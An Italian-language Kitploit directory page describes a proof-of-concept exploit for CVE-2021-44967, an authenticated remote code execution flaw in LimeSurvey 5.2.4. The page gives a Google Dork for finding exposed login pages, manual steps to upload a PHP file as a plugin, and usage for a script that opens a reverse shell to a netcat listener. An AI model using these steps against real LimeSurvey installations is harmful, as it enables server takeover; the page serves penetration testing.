Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44967 — Exploit POC per CVE-2021-44967 | Kitploit
Strumenti/GitHubGitHub/d3ext/cve-2021-44967
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubd3ext/cve-2021-44967

CVE-2021-44967

Exploit POC per CVE-2021-44967

Vedi Repository
611 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-44967

root@kitploit:~
# Exploit Title: LimeSurvey 5.2.4 - Authenticated Remote Code Execution (RCE)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Discovered by: Y1LD1R1M
# Exploit Author: D3Ext
# Vendor Homepage: https://www.limesurvey.org/
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Tested on: Kali Linux 2025
# CVE: CVE-2021-44967

Spiegazione

Esiste una vulnerabilità di Remote Code Execution (RCE) in LimeSurvey 5.2.4 tramite la funzione di caricamento e installazione dei plugin, che potrebbe consentire a un utente malintenzionato remoto di caricare un file di codice PHP arbitrario.

Questi sono i passaggi da seguire per sfruttare manualmente questa vulnerabilità:

  1. Creare uno ZIP contenente il file PHP e il file di configurazione
  2. Accedere a LimeSurvey
  3. Andare su Configurazione -> Plugin -> Carica e installa
  4. Caricare il file ZIP
  5. Installarlo
  6. Infine, attivare il plugin
  7. Quindi il tuo codice PHP dovrebbe essere accessibile sotto /upload/plugins/<plugin_name>/<php_file>

Utilizzo

root@kitploit:~
usage: CVE-2021-44967.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]

CVE-2021-44967 - LimeSurvey Authenticated RCE

options:
  -h, --help           show this help message and exit
  --url URL            URL of the LimeSurvey web root
  --user USER          username to log in
  --password PASSWORD  password of the username
  --lhost LHOST        local host to receive the reverse shell
  --lport LPORT        local port to receive the reverse shell
  --verbose            enable verbose
Scarica lo strumento

Avvia un listener netcat e poi esegui l'exploit in questo modo:

root@kitploit:~
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>

Demo

Riferimenti

root@kitploit:~
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029

Licenza

Questo progetto è sotto licenza MIT

Copyright © 2025, D3Ext